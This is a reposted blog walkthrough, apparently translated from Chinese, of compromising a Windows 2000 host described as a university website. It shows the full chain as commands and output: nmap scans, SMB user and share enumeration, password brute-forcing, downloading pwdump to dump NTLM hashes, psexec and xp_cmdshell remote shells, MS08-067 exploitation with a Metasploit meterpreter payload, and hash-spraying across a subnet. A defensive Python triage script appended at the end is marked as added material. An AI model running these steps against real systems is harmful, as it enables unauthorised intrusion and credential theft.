  Advanced use of nmap in practice

    Reposted. Since the target is a Windows 2000 system, it is not very representative.

    Guangxi Normal University website http://202.103.242.241/
    root@bt:~# nmap -sS -sV 202.103.242.241
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
    Nmap scan report for bogon (202.103.242.241)
    Host is up (0.00048s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE VERSION
    135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
    1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
    1026/tcp open msrpc Microsoft Windows RPC
    3372/tcp open msdtc?
    3389/tcp open ms-term-serv?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
    SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
    SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
    SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
    SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
    SF:ptions,6,"hO\n\x000Z");
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Service Info: OS: Windows
    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
    root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb // list the SMB scripts
    -rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
    -rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
    -rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
    -rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
    -rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
    -rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
    -rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
    -rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
    -rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
    -rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
    -rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
    -rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
    -rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
    -rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
    -rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
    root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
    // use the script to enumerate the accounts that exist on the remote host
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
    Nmap scan report for bogon (202.103.242.241)
    Host is up (0.00038s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-enum-users:
    |_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser // scan result
    Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
    root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
    // list the shares
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
    Nmap scan report for bogon (202.103.242.241)
    Host is up (0.00035s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-enum-shares:
    | ADMIN$
    | Anonymous access: <none>
    | C$
    | Anonymous access: <none>
    | IPC$
    |_ Anonymous access: READ
    Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
    root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
    // obtain user passwords
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
    Nmap scan report for bogon (202.103.242.241)
    Host is up (0.00041s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-brute:
    | administrator:<blank> => Login was successful
    |_ test:123456 => Login was successful
    Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
    root@bt:~# wget http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.tar.bz2
    root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
    root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
    root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
    Nmap scan report for bogon (202.103.242.241)
    Host is up (0.0012s latency).
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-pwdump:
    | Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
    | Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
    | test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
    |_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
    Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
    C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe // get a cmd shell
    PsExec v1.55 - Execute processes remotely
    Copyright (C) 2001-2004 Mark Russinovich
    Sysinternals - www.sysinternals.com
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) 版权所有 1985-2000 Microsoft Corp.
    C:\WINNT\system32>ipconfig
    Windows 2000 IP Configuration
    Ethernet adapter 本地连接:
    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 202.103.242.241
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 202.103.1.1
    C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" // log in remotely as sa and execute a command
    root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 // check the target host for vulnerabilities
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
    Nmap scan report for bogon (202.103.242.241)
    Host is up (0.00046s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-check-vulns:
    |_ MS08-067: VULNERABLE
    Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
    root@bt:~# msfconsole // exploit the MS08-067 vulnerability against the target from within msf
    msf > search ms08
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show options
    msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
    msf exploit(ms08_067_netapi) > show payloads
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
    msf exploit(ms08_067_netapi) > exploit
    meterpreter >
    Background session 2
    msf exploit(ms08_067_netapi) > sessions -l
    root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
    test
    administrator
    root@bt:/usr/local/share/nmap/scripts# vim password.txt
    44EFCE164AB921CAAAD3B435B51404EE
    root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
    // try logging in across the whole internal subnet with the usernames and the captured hashes
    Nmap scan report for 192.168.1.105
    Host is up (0.00088s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-brute:
    |_ administrator:<blank> => Login was successful
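    As an added example that is not part of the original post, the following Python script takes the other side of the same nmap output: it parses the "Host script results" section produced by runs such as the smb-enum-shares, smb-brute and smb-check-vulns scans above and turns each finding into a remediation item, so a scan of one's own hosts becomes a fix list. The report text embedded below is constructed to mirror nmap's normal output format; the address 192.0.2.10, the severity labels and the remediation wording are assumptions of this example and do not come from the page.

```python
"""Triage nmap normal-output text for SMB findings (added example, not from the original post)."""
import re
from dataclasses import dataclass

# Constructed sample report in nmap's normal-output layout; 192.0.2.10 is a
# documentation-range address, not a host from the page.
SAMPLE_REPORT = """\
Nmap scan report for 192.0.2.10
Host is up (0.00046s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful
| smb-check-vulns:
|_ MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
"""

@dataclass(frozen=True)
class Finding:
    host: str
    severity: str      # assumed scale: "critical" or "high"
    detail: str
    remediation: str

# "Nmap scan report for bogon (1.2.3.4)" or "Nmap scan report for 1.2.3.4"
_REPORT_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
_SCRIPT_RE = re.compile(r"^\|_? ?([\w-]+):\s*$")          # "| smb-brute:"
_LOGIN_RE = re.compile(r"^(\S+?):(.*?) => Login was successful")
_VULN_RE = re.compile(r"^(\S+): VULNERABLE")
_ANON_RE = re.compile(r"^Anonymous access: (\S+)")

def parse_script_results(text):
    """Return {host: {script_name: [result lines]}} from nmap normal output."""
    hosts, host, script, in_results = {}, None, None, False
    for raw in text.splitlines():
        line = raw.strip()
        m = _REPORT_RE.match(line)
        if m:                                   # a new host report starts
            host, script, in_results = m.group(1), None, False
            hosts[host] = {}
            continue
        if line == "Host script results:":
            in_results = host is not None
            continue
        if not in_results:
            continue
        if not line.startswith("|"):            # first non-pipe line ends the block
            in_results = False
            continue
        m = _SCRIPT_RE.match(line)
        if m:                                   # header line names the script
            script = m.group(1)
            hosts[host].setdefault(script, [])
            continue
        if script is not None:                  # body line belongs to current script
            hosts[host][script].append(line.lstrip("|_").strip())
    return hosts

def triage(text):
    """Map each SMB script finding to a Finding with a remediation action."""
    findings = []
    for host, scripts in parse_script_results(text).items():
        share = None
        for entry in scripts.get("smb-enum-shares", []):
            m = _ANON_RE.match(entry)
            if m is None:
                share = entry                   # a bare line is the share name
            elif m.group(1) != "<none>":
                findings.append(Finding(host, "high",
                    f"share {share} allows anonymous {m.group(1)}",
                    "disable null sessions (RestrictAnonymous) and audit share ACLs"))
        for entry in scripts.get("smb-brute", []):
            m = _LOGIN_RE.match(entry)
            if m:
                weak = "blank" if m.group(2) == "<blank>" else "guessable"
                findings.append(Finding(host, "critical",
                    f"account {m.group(1)} has a {weak} password",
                    "reset the password, enforce lockout, and review logon audit events"))
        for entry in scripts.get("smb-check-vulns", []):
            m = _VULN_RE.match(entry)
            if m:
                findings.append(Finding(host, "critical",
                    f"missing patch {m.group(1)}",
                    "apply the vendor patch and block 445/tcp from untrusted networks"))
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_REPORT):
        print(f"[{f.severity}] {f.host}: {f.detail} -> {f.remediation}")
```

    The parser is deliberately keyed on the normal-output layout shown in this post; for production use, nmap's XML output (-oX) is the stable interface, but the text format is what most people paste into tickets, so being able to triage it directly is useful.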

  Original source: https://www.cnblogs.com/vigarbuaa/p/3099665.html